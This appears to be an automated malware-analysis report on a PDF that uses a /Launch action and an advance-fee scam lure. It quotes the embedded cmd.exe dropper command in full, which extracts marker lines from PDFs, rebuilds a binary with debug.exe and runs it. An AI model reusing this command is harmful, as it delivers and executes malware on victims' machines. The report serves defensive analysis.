Malicious PDF — malware analysis report

Static analysis result for SHA-256 370f7c9b76a04f0f…

Verdict: MALICIOUS
File type: PDF
Size: 2.16 MB
Created: 2009-06-17 08:28:24 -04:00
Authoring application: Acrobat PDFMaker 8.1 for Word (via Acrobat Distiller 8.1.0 (Windows))
MD5: 2beaf85bf6d6f3eaf7c1480106bbe290
SHA-1: 3ce0d5fe4ebc8610fb486aa8bfbf8ba3d6965734
SHA-256: 370f7c9b76a04f0ffcbfca518131653a7a10e53399db7ac15560af1bd4c181cd
Risk Score: 160

Malware Insights

MITRE ATT&CK
  • T1059.003 Windows Command Shell
  • T1204.002 Malicious File

The PDF file triggers the critical PDF_LAUNCH heuristic, indicating an attempt to execute a command. The identified command is 'c:\windows\system32\cmd.exe /C findstr fuqkjqdhrj *.pdf > gplrd.src && debug < gplrd.src > out.txt && rename nyyqp.txt nyyqp.exe && start nyyqp.exe'. Read step by step, it searches the PDF files in the current directory for lines containing the marker string 'fuqkjqdhrj', writes those lines to gplrd.src, feeds that file to the legacy debug.exe tool to rebuild a binary from it, renames the result from nyyqp.txt to nyyqp.exe and starts it; this suggests the file is designed to process other PDF files to extract and execute malicious content. The SE_ADVANCE_FEE_SCAM_LURE heuristic further supports that the document's content is intended to deceive the user into performing an action that leads to malware execution.

Heuristics (4)

  • Launch action (critical) PDF_LAUNCH
    PDF contains a /Launch action whose target is an executable, URL, or UNC path — can start an external application
  • /Launch action target: c:\windows\system32\cmd.exe (critical) PDF_LAUNCH_COMMAND
    PDF /Launch action specifies an executable target with parameters '/C findstr fuqkjqdhrj *.pdf > gplrd.src && debug < gplrd.src > out.txt && rename nyyqp.txt nyyqp.exe && start nyyqp.exe' — references a known-dangerous executable (cmd, PowerShell, etc.).
  • Advance-fee lottery/parcel scam lure (high) SE_ADVANCE_FEE_SCAM_LURE
    Document contains lottery/beneficiary or prize language together with large-value draft/funds wording and parcel/courier delivery requirements. This is a classic advance-fee fraud document shape.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Extracted URLs (all are standard XMP/RDF metadata namespace identifiers, not navigable links):
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://ns.adobe.com/xap/1.0/
    • http://purl.org/dc/elements/1.1/
    • http://ns.adobe.com/xap/1.0/mm/
    • http://ns.adobe.com/pdf/1.3/
    • http://ns.adobe.com/pdfx/1.3/
    • http://ns.adobe.com/xap/1.0/g/img/
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
    • http://ns.adobe.com/tiff/1.0/
    • http://ns.adobe.com/exif/1.0/
    • http://ns.adobe.com/photoshop/1.0/

Extracted artifacts (8)

Files carved from inside the sample during analysis.

  • stream_102_off0014bbe4.bin
    SHA-256: 2fd39c2b5fc5bccd096feb40c4e48270fb8940450b8a628ad5b4d1b95b01cfe4
    Kind: decompressed-pdf-stream; Source: PDF FlateDecoded stream at offset 0x14BBE4; Size: 4194304 bytes
  • icc_00_off0001f78f.icc
    SHA-256: 2b3aa1645779a9e634744faf9b01e9102b0c9b88fd6deced7934df86b949af7e
    Kind: pdf-icc-profile; Source: PDF ICC profile at offset 0x1F78F; Size: 3144 bytes
  • icc_01_off0007e47c.icc
    SHA-256: 3f6d674174f3804eb0dabdac90ae17486e898c5063a66f861c116ea033da8301
    Kind: pdf-icc-profile; Source: PDF ICC profile at offset 0x7E47C; Size: 3144 bytes
  • font_00_sfnt_off00012c17.bin
    SHA-256: 7e80129f677131766bd80caf36d48d2110e7219bb052c31847778a2af28bfa9a
    Kind: pdf-font-stream; Source: PDF embedded font (sfnt) at offset 0x12C17; Size: 23776 bytes
  • font_01_sfnt_off0001a31e.bin
    SHA-256: 81712040490068705e4bc97ae2a6b0366454629421792c1ce9dfbf7f91a19013
    Kind: pdf-font-stream; Source: PDF embedded font (sfnt) at offset 0x1A31E; Size: 5884 bytes
  • font_02_sfnt_off0005ad0d.bin
    SHA-256: 229c0711dddf51101d227913ecadf86da1a971312e23a3622a35026e857d0240
    Kind: pdf-font-stream; Source: PDF embedded font (sfnt) at offset 0x5AD0D; Size: 20220 bytes
  • font_03_sfnt_off0006682d.bin
    SHA-256: 0b2d8a023a8107b0184169ada4854df34ac93513b6b998174ddf6a3fe2cd0f17
    Kind: pdf-font-stream; Source: PDF embedded font (sfnt) at offset 0x6682D; Size: 20860 bytes
  • font_04_sfnt_off00075ffe.bin
    SHA-256: 7ce500e55d2b12ef606eba085838407ccc3cc2991eb12ba75cabe3df22e2f293
    Kind: pdf-font-stream; Source: PDF embedded font (sfnt) at offset 0x75FFE; Size: 18968 bytes